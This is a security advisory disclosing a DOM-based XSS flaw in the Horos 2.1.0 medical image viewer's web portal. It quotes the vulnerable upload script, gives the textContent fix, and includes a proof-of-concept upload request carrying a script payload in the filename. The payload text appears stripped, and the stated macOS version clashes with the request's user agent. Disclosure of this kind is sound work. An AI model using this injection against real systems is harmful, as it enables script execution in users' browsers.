Horos 2.1.0 Web Portal DOM Based XSS Vendor: Horos Project Product web page: https://www.horosproject.org Affected version: 2.1.0 Summary: Horos™ is an open-source, free medical image viewer. The goal of the Horos Project is to develop a fully functional, 64-bit medical image viewer for OS X. Horos is based upon OsiriX and other open source medical imaging libraries. Desc: Horos suffers from a DOM-based XSS vulnerability because it doesn't use proper sanitization when user input goes to a dangerous HTML modification sink ((element).innerHTML). This can be exploited to execute arbitrary HTML and script code in a user's browser DOM in context of an affected site. Tested on: macOS 12.10.2 (Sierra) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2016-5385 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5385.php 15.12.2016 -- ------vuln----- function fileSelected() { var file = document.getElementById('fileToUpload').files[0]; if (file) { var fileSize = 0; if (file.size > 1024 * 1024) fileSize = (Math.round(file.size * 100 / (1024 * 1024)) / 100).toString() + 'MB'; else fileSize = (Math.round(file.size * 100 / 1024) / 100).toString() + 'KB'; document.getElementById('fileName').innerHTML = 'Name: ' + file.name; // xss document.getElementById('fileSize').innerHTML = 'Size: ' + fileSize; document.getElementById('fileType').innerHTML = 'Type: ' + file.type; } } function uploadFile() { document.getElementById('progressbar').innerHTML = '0%'; document.getElementById("progressbar").style.width = '0%'; document.getElementById("progressbar").className = "progress-bar progress-bar-striped"; document.getElementById("upload_button").className = "btn btn-default disabled"; setTimeout(function(){ var fd = new FormData(); fd.append("fileToUpload", document.getElementById('fileToUpload').files[0]); var xhr = new XMLHttpRequest(); xhr.upload.addEventListener("progress", uploadProgress, false); xhr.addEventListener("load", uploadComplete, false); xhr.addEventListener("error", uploadFailed, false); xhr.addEventListener("abort", uploadCanceled, false); xhr.open("POST", "", true); xhr.send(fd); }, 500); } ... ------/vuln----- Element output:

Name:

.mp3

Fix: (element).innerText or (element).textContent PoC payload:

: POST /main HTTP/1.1 Host: 127.0.0.1:3333 Content-Length: 3 Origin: http://127.0.0.1:3333 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBUg5yXYbUF1w5AEi Accept: */* Referer: http://127.0.0.1:3333/main Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.8 Cookie: OSID=53B11D55703E7A7DA14AF867B2C7E346 DNT: 1 Connection: close ------WebKitFormBoundaryBUg5yXYbUF1w5AEi Content-Disposition: form-data; name="fileToUpload"; filename="

.mp3" Content-Type: audio/mp3 ZSL ------WebKitFormBoundaryBUg5yXYbUF1w5AEi--